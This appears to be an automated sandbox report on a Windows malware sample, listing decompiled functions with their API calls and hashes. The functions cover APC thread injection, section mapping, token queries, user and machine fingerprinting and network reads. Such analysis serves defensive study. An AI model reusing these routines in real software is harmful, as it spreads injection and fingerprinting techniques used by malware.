                                                                                                                                  						_t45 = GetLastError();
                                                                                                                                  						_v16 = _t45;
                                                                                                                                  						TerminateThread(_t75, _t45);
                                                                                                                                  						CloseHandle(_t75);
                                                                                                                                  						_t75 = 0;
                                                                                                                                  						SetLastError(_v16);
                                                                                                                                  					}
                                                                                                                                  					if(_t75 == 0) {
                                                                                                                                  						goto L25;
                                                                                                                                  					} else {
                                                                                                                                  						_t41 = WaitForSingleObject(_t75, 0xffffffff);
                                                                                                                                  						_v8 = _t41;
                                                                                                                                  						if(_t41 == 0) {
                                                                                                                                  							GetExitCodeThread(_t75,  &_v8);
                                                                                                                                  						}
                                                                                                                                  						CloseHandle(_t75);
                                                                                                                                  						goto L26;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t76 = __imp__GetLongPathNameW;
                                                                                                                                  				_t61 = _v12;
                                                                                                                                  				_t48 =  *_t76(_t61, _t59, _t59); // executed
                                                                                                                                  				_t69 = _t48;
                                                                                                                                  				if(_t69 == 0) {
                                                                                                                                  					L15:
                                                                                                                                  					 *0x4030f8 = _t61;
                                                                                                                                  					L16:
                                                                                                                                  					_t59 = 0;
                                                                                                                                  					goto L18;
                                                                                                                                  				}
                                                                                                                                  				_t23 = _t69 + 2; // 0x2
                                                                                                                                  				_t50 = E004016EE(_t69 + _t23);
                                                                                                                                  				 *0x4030f8 = _t50;
                                                                                                                                  				if(_t50 == 0) {
                                                                                                                                  					goto L15;
                                                                                                                                  				}
                                                                                                                                  				 *_t76(_t61, _t50, _t69); // executed
                                                                                                                                  				E004017CB(_t61);
                                                                                                                                  				goto L16;
                                                                                                                                  			}





























                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00401752: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019AC), ref: 00401761
                                                                                                                                    • Part of subcall function 00401752: GetVersion.KERNEL32 ref: 00401770
                                                                                                                                    • Part of subcall function 00401752: GetCurrentProcessId.KERNEL32 ref: 0040178C
                                                                                                                                    • Part of subcall function 00401752: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 004017A5
                                                                                                                                    • Part of subcall function 004016EE: HeapAlloc.KERNEL32(00000000,?,004019CF,00000030,?,00000000), ref: 004016FA
                                                                                                                                  • NtQuerySystemInformation.NTDLL ref: 004019DF
                                                                                                                                  • Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A26
                                                                                                                                  • GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00401A55
                                                                                                                                  • GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00401A73
                                                                                                                                  • CreateThread.KERNEL32 ref: 00401A9D
                                                                                                                                  • QueueUserAPC.KERNEL32(004013C4,00000000,?,?,00000000), ref: 00401AB9
                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00401AC9
                                                                                                                                  • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401AD0
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401AD7
                                                                                                                                  • SetLastError.KERNEL32(?,?,00000000), ref: 00401ADE
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401AEB
                                                                                                                                  • GetExitCodeThread.KERNEL32(00000000,00000008,?,00000000), ref: 00401AFD
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B04
                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00401B08
                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00401B15
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Thread$CloseCreateHandleLongNamePathProcess$AllocCodeCurrentEventExitHeapInformationObjectOpenQueryQueueSingleSleepSystemTerminateUserVersionWait
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2806485730-4108050209
                                                                                                                                  • Opcode ID: 3788db5b3d14facb3acde25c59a1a62789e76d27affbce678ad3d56668680855
                                                                                                                                  • Instruction ID: 752d4060508721c6492002363c13e596e1a4780a18635d73c6680d1c48b3a507
                                                                                                                                  • Opcode Fuzzy Hash: 3788db5b3d14facb3acde25c59a1a62789e76d27affbce678ad3d56668680855
                                                                                                                                  • Instruction Fuzzy Hash: 5F417371D01215ABDB11AFE58D88D9F7ABCAF08314B10417BE601F32A0E7789E44CB68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E022B7A2E(char __eax, void* __esi) {
                                                                                                                                  				long _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				long _t34;
                                                                                                                                  				signed int _t39;
                                                                                                                                  				long _t50;
                                                                                                                                  				char _t59;
                                                                                                                                  				intOrPtr _t61;
                                                                                                                                  				void* _t62;
                                                                                                                                  				void* _t64;
                                                                                                                                  				char _t65;
                                                                                                                                  				intOrPtr* _t67;
                                                                                                                                  				void* _t68;
                                                                                                                                  				void* _t69;
                                                                                                                                  
                                                                                                                                  				_t69 = __esi;
                                                                                                                                  				_t65 = __eax;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_v12 = __eax;
                                                                                                                                  				if(__eax == 0) {
                                                                                                                                  					_t59 =  *0x22bd270; // 0xd448b889
                                                                                                                                  					_v12 = _t59;
                                                                                                                                  				}
                                                                                                                                  				_t64 = _t69;
                                                                                                                                  				E022B4F97( &_v12, _t64);
                                                                                                                                  				if(_t65 != 0) {
                                                                                                                                  					 *_t69 =  *_t69 ^  *0x22bd2a4 ^ 0x46d76429;
                                                                                                                                  				} else {
                                                                                                                                  					GetUserNameW(0,  &_v8); // executed
                                                                                                                                  					_t50 = _v8;
                                                                                                                                  					if(_t50 != 0) {
                                                                                                                                  						_t62 = RtlAllocateHeap( *0x22bd238, 0, _t50 + _t50);
                                                                                                                                  						if(_t62 != 0) {
                                                                                                                                  							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                  								_t64 = _t62;
                                                                                                                                  								 *_t69 =  *_t69 ^ E022B2C0D(_v8 + _v8, _t64);
                                                                                                                                  							}
                                                                                                                                  							HeapFree( *0x22bd238, 0, _t62);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t61 = __imp__;
                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                  				GetComputerNameW(0,  &_v8);
                                                                                                                                  				_t34 = _v8;
                                                                                                                                  				if(_t34 != 0) {
                                                                                                                                  					_t68 = RtlAllocateHeap( *0x22bd238, 0, _t34 + _t34);
                                                                                                                                  					if(_t68 != 0) {
                                                                                                                                  						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                  							_t64 = _t68;
                                                                                                                                  							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E022B2C0D(_v8 + _v8, _t64);
                                                                                                                                  						}
                                                                                                                                  						HeapFree( *0x22bd238, 0, _t68);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				asm("cpuid");
                                                                                                                                  				_t67 =  &_v28;
                                                                                                                                  				 *_t67 = 1;
                                                                                                                                  				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                  				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                                                  				 *(_t67 + 0xc) = _t64;
                                                                                                                                  				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                  				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                                                                                                  				return _t39;
                                                                                                                                  			}




















                                                                                                                                  APIs
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 022B7A65
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 022B7A7C
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 022B7A89
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,022B30EE), ref: 022B7AAA
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 022B7AD1
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 022B7AE5
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 022B7AF2
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,022B30EE), ref: 022B7B10
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3239747167-8415677
                                                                                                                                  • Opcode ID: 1acadd7c968fcdb6d54ba12ecc9a7e87cc8b0c690dc19e64acb5fd640b9ba6cb
                                                                                                                                  • Instruction ID: f6901da06307ca440c83e9fe9365ffcc734512e3402118d6a45eb0d445c234dd
                                                                                                                                  • Opcode Fuzzy Hash: 1acadd7c968fcdb6d54ba12ecc9a7e87cc8b0c690dc19e64acb5fd640b9ba6cb
                                                                                                                                  • Instruction Fuzzy Hash: 99311A72A50206EFDB12DFE5DC84AAEF7F9EF84354F114829E505D7210E770DA519B10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                  			E00401E22(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				struct _FILETIME* _v16;
                                                                                                                                  				short _v60;
                                                                                                                                  				struct _FILETIME* _t14;
                                                                                                                                  				intOrPtr _t15;
                                                                                                                                  				long _t18;
                                                                                                                                  				void* _t19;
                                                                                                                                  				void* _t22;
                                                                                                                                  				intOrPtr _t31;
                                                                                                                                  				long _t32;
                                                                                                                                  				void* _t34;
                                                                                                                                  
                                                                                                                                  				_t31 = __edx;
                                                                                                                                  				_t14 =  &_v16;
                                                                                                                                  				GetSystemTimeAsFileTime(_t14);
                                                                                                                                  				_push(0x192);
                                                                                                                                  				_push(0x54d38000);
                                                                                                                                  				_push(_v12);
                                                                                                                                  				_push(_v16);
                                                                                                                                  				L00401F3A();
                                                                                                                                  				_push(_t14);
                                                                                                                                  				_v16 = _t14;
                                                                                                                                  				_t15 =  *0x403104;
                                                                                                                                  				_push(_t15 + 0x40405e);
                                                                                                                                  				_push(_t15 + 0x404054);
                                                                                                                                  				_push(0x16);
                                                                                                                                  				_push( &_v60);
                                                                                                                                  				_v12 = _t31;
                                                                                                                                  				L00401F34();
                                                                                                                                  				_t18 = _a4;
                                                                                                                                  				if(_t18 == 0) {
                                                                                                                                  					_t18 = 0x1000;
                                                                                                                                  				}
                                                                                                                                  				_t19 = CreateFileMappingW(0xffffffff, 0x403108, 4, 0, _t18,  &_v60); // executed
                                                                                                                                  				_t34 = _t19;
                                                                                                                                  				if(_t34 == 0) {
                                                                                                                                  					_t32 = GetLastError();
                                                                                                                                  				} else {
                                                                                                                                  					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                  						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                  						if(_t22 == 0) {
                                                                                                                                  							_t32 = GetLastError();
                                                                                                                                  							if(_t32 != 0) {
                                                                                                                                  								goto L9;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							 *_a8 = _t34;
                                                                                                                                  							 *_a12 = _t22;
                                                                                                                                  							_t32 = 0;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t32 = 2;
                                                                                                                                  						L9:
                                                                                                                                  						CloseHandle(_t34);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t32;
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?,?), ref: 00401E2F
                                                                                                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401E45
                                                                                                                                  • _snwprintf.NTDLL ref: 00401E6A
                                                                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,00403108,00000004,00000000,?,?), ref: 00401E8F
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?), ref: 00401EA6
                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00401EBA
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?), ref: 00401ED2
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A), ref: 00401EDB
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?), ref: 00401EE3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1724014008-0
                                                                                                                                  • Opcode ID: fca7e80b9ba9561c9709ad2fe4079cad74267bb47c00cdbe9b3e782023aa4d13
                                                                                                                                  • Instruction ID: a99f727ced56dbd8a4c2c124101b8a7b9c2e615e3b488e27424ce2f1f10c42e7
                                                                                                                                  • Opcode Fuzzy Hash: fca7e80b9ba9561c9709ad2fe4079cad74267bb47c00cdbe9b3e782023aa4d13
                                                                                                                                  • Instruction Fuzzy Hash: 2521A1B2900209BFD711AFA4DD88EAF37A9EB48354F114036FB05F72E0D6749905CBA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                  			E022B9A0F(char _a4, void* _a8) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				char _v24;
                                                                                                                                  				char _v28;
                                                                                                                                  				char _v32;
                                                                                                                                  				char _v36;
                                                                                                                                  				char _v40;
                                                                                                                                  				void* _v44;
                                                                                                                                  				void** _t33;
                                                                                                                                  				void* _t40;
                                                                                                                                  				void* _t43;
                                                                                                                                  				void** _t44;
                                                                                                                                  				intOrPtr* _t47;
                                                                                                                                  				char _t48;
                                                                                                                                  
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v20 = _a4;
                                                                                                                                  				_t48 = 0;
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_a4 = 0;
                                                                                                                                  				_v44 = 0x18;
                                                                                                                                  				_v40 = 0;
                                                                                                                                  				_v32 = 0;
                                                                                                                                  				_v36 = 0;
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				_v24 = 0;
                                                                                                                                  				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                  					_t33 =  &_v8;
                                                                                                                                  					__imp__(_v12, 8, _t33);
                                                                                                                                  					if(_t33 >= 0) {
                                                                                                                                  						_t47 = __imp__;
                                                                                                                                  						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                  						_t44 = E022B1525(_a4);
                                                                                                                                  						if(_t44 != 0) {
                                                                                                                                  							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                  							if(_t40 >= 0) {
                                                                                                                                  								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                  								_t48 = 1;
                                                                                                                                  							}
                                                                                                                                  							E022B8B22(_t44);
                                                                                                                                  						}
                                                                                                                                  						NtClose(_v8); // executed
                                                                                                                                  					}
                                                                                                                                  					NtClose(_v12);
                                                                                                                                  				}
                                                                                                                                  				return _t48;
                                                                                                                                  			}




















                                                                                                                                  APIs
                                                                                                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 022B9A56
                                                                                                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 022B9A69
                                                                                                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 022B9A85
                                                                                                                                    • Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531
                                                                                                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 022B9AA2
                                                                                                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 022B9AAF
                                                                                                                                  • NtClose.NTDLL(?), ref: 022B9AC1
                                                                                                                                  • NtClose.NTDLL(00000000), ref: 022B9ACB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2575439697-0
                                                                                                                                  • Opcode ID: 928e05bfc5c41ef92a8a0a285687ee7bcc89d43119a7bb82e5a63119010a2b74
                                                                                                                                  • Instruction ID: f7043e06737cf76301eda72c462e95a830b4cc4fcc627f1f0b78fa83a310215b
                                                                                                                                  • Opcode Fuzzy Hash: 928e05bfc5c41ef92a8a0a285687ee7bcc89d43119a7bb82e5a63119010a2b74
                                                                                                                                  • Instruction Fuzzy Hash: 532105B2950219BFDB029FE5DC44ADEBFBDEF08780F108422FA05E6110D7719A549FA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                  			E022B5988(void* __eax, void* __ecx) {
                                                                                                                                  				long _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void _v20;
                                                                                                                                  				void* __esi;
                                                                                                                                  				void* _t30;
                                                                                                                                  				void* _t38;
                                                                                                                                  				intOrPtr* _t39;
                                                                                                                                  				intOrPtr* _t41;
                                                                                                                                  				int _t45;
                                                                                                                                  				void* _t54;
                                                                                                                                  				long _t64;
                                                                                                                                  				void* _t67;
                                                                                                                                  				void* _t69;
                                                                                                                                  
                                                                                                                                  				_t58 = __ecx;
                                                                                                                                  				_t67 = __eax;
                                                                                                                                  				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                                                                                                  					L2:
                                                                                                                                  					_t30 = _t67;
                                                                                                                                  					_pop(_t68);
                                                                                                                                  					_t69 = _t30;
                                                                                                                                  					_t64 = 0;
                                                                                                                                  					ResetEvent( *(_t69 + 0x1c));
                                                                                                                                  					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
                                                                                                                                  						L9:
                                                                                                                                  						if(_v8 == 0) {
                                                                                                                                  							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                                                                                                                  						} else {
                                                                                                                                  							 *0x22bd164(0, 1,  &_v12); // executed
                                                                                                                                  							if(0 != 0) {
                                                                                                                                  								_t64 = 8;
                                                                                                                                  							} else {
                                                                                                                                  								_t38 = E022B1525(0x1000);
                                                                                                                                  								_v16 = _t38;
                                                                                                                                  								if(_t38 == 0) {
                                                                                                                                  									_t64 = 8;
                                                                                                                                  								} else {
                                                                                                                                  									_push(0);
                                                                                                                                  									_push(_v8);
                                                                                                                                  									_push( &_v20);
                                                                                                                                  									while(1) {
                                                                                                                                  										_t41 = _v12;
                                                                                                                                  										_t61 =  *_t41;
                                                                                                                                  										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                                                                                                                  										ResetEvent( *(_t69 + 0x1c));
                                                                                                                                  										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
                                                                                                                                  										if(_t45 != 0) {
                                                                                                                                  											goto L17;
                                                                                                                                  										}
                                                                                                                                  										_t64 = GetLastError();
                                                                                                                                  										if(_t64 == 0x3e5) {
                                                                                                                                  											_t64 = E022B29C0( *(_t69 + 0x1c), _t61, 0xffffffff);
                                                                                                                                  											if(_t64 == 0) {
                                                                                                                                  												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                                                                                                  												if(_t64 == 0) {
                                                                                                                                  													goto L17;
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  										L19:
                                                                                                                                  										E022B8B22(_v16);
                                                                                                                                  										if(_t64 == 0) {
                                                                                                                                  											_t64 = E022B48CB(_v12, _t69);
                                                                                                                                  										}
                                                                                                                                  										goto L22;
                                                                                                                                  										L17:
                                                                                                                                  										_t64 = 0;
                                                                                                                                  										if(_v8 != 0) {
                                                                                                                                  											_push(0);
                                                                                                                                  											_push(_v8);
                                                                                                                                  											_push(_v16);
                                                                                                                                  											continue;
                                                                                                                                  										}
                                                                                                                                  										goto L19;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								L22:
                                                                                                                                  								_t39 = _v12;
                                                                                                                                  								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t64 = GetLastError();
                                                                                                                                  						if(_t64 != 0x3e5) {
                                                                                                                                  							L8:
                                                                                                                                  							if(_t64 == 0) {
                                                                                                                                  								goto L9;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							_t64 = E022B29C0( *(_t69 + 0x1c), _t58, 0xffffffff);
                                                                                                                                  							if(_t64 == 0) {
                                                                                                                                  								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                                                                                                  								goto L8;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _t64;
                                                                                                                                  				} else {
                                                                                                                                  					_t54 = E022B57DD(__ecx, __eax);
                                                                                                                                  					if(_t54 != 0) {
                                                                                                                                  						return _t54;
                                                                                                                                  					} else {
                                                                                                                                  						goto L2;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}


















                                                                                                                                  APIs
                                                                                                                                  • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 022BA55D
                                                                                                                                  • InternetReadFile.WININET(?,?,00000004,?), ref: 022BA56C
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 022BA576
                                                                                                                                  • ResetEvent.KERNEL32(?), ref: 022BA5EF
                                                                                                                                  • InternetReadFile.WININET(?,?,00001000,?), ref: 022BA600
                                                                                                                                  • GetLastError.KERNEL32 ref: 022BA60A
                                                                                                                                    • Part of subcall function 022B57DD: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 022B57F4
                                                                                                                                    • Part of subcall function 022B57DD: SetEvent.KERNEL32(?), ref: 022B5804
                                                                                                                                    • Part of subcall function 022B57DD: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 022B5836
                                                                                                                                    • Part of subcall function 022B57DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 022B585B
                                                                                                                                    • Part of subcall function 022B57DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 022B587B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2393427839-0
                                                                                                                                  • Opcode ID: 308c112f11f5c865d2bb51e072ba091c99ce5cd26c7d8bad86e800bc38ad7837
                                                                                                                                  • Instruction ID: 7200003d94d4a0badf2fe8f2f83d211c657a727ff66d8adc2032ed9f2ab1ca94
                                                                                                                                  • Opcode Fuzzy Hash: 308c112f11f5c865d2bb51e072ba091c99ce5cd26c7d8bad86e800bc38ad7837
                                                                                                                                  • Instruction Fuzzy Hash: 7241C372A20605ABCF239FF4DC44BEE77B9AF883E0F140929E556D7294DB70D9418B50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                  			E00401C90(intOrPtr* __eax, void** _a4) {
                                                                                                                                  				int _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				int _v28;
                                                                                                                                  				int _v32;
                                                                                                                                  				intOrPtr _v36;
                                                                                                                                  				int _v40;
                                                                                                                                  				int _v44;
                                                                                                                                  				void* _v48;
                                                                                                                                  				void* __esi;
                                                                                                                                  				long _t34;
                                                                                                                                  				void* _t39;
                                                                                                                                  				void* _t47;
                                                                                                                                  				intOrPtr* _t48;
                                                                                                                                  
                                                                                                                                  				_t48 = __eax;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_v48 = 0x18;
                                                                                                                                  				_v44 = 0;
                                                                                                                                  				_v36 = 0x40;
                                                                                                                                  				_v40 = 0;
                                                                                                                                  				_v32 = 0;
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                  				if(_t34 < 0) {
                                                                                                                                  					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                  				} else {
                                                                                                                                  					 *_t48 = _v16;
                                                                                                                                  					_t39 = E00401703(_t48,  &_v12); // executed
                                                                                                                                  					_t47 = _t39;
                                                                                                                                  					if(_t47 != 0) {
                                                                                                                                  						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                  					} else {
                                                                                                                                  						memset(_v12, 0, _v24);
                                                                                                                                  						 *_a4 = _v12;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t47;
                                                                                                                                  			}



















                                                                                                                                  APIs
                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 00401CED
                                                                                                                                    • Part of subcall function 00401703: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401D02,00000002,00000000,?,?,00000000,?,?,00401D02,00000002), ref: 00401730
                                                                                                                                  • memset.NTDLL ref: 00401D0F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Section$CreateViewmemset
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 2533685722-2766056989
                                                                                                                                  • Opcode ID: a0432050cf41c84421b6c7dc0a27d288bc4abc767ba214151e892c20fd89f3a1
                                                                                                                                  • Instruction ID: d00bf08d6aa1ecb95d0b181047dcd8cf727594324f693dbf64d6d2eb4fe127ad
                                                                                                                                  • Opcode Fuzzy Hash: a0432050cf41c84421b6c7dc0a27d288bc4abc767ba214151e892c20fd89f3a1
                                                                                                                                  • Instruction Fuzzy Hash: E521F9B5D0020DAFDB11DFA9C8849DEFBB9EF48354F10843AE615F3250D734AA458B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

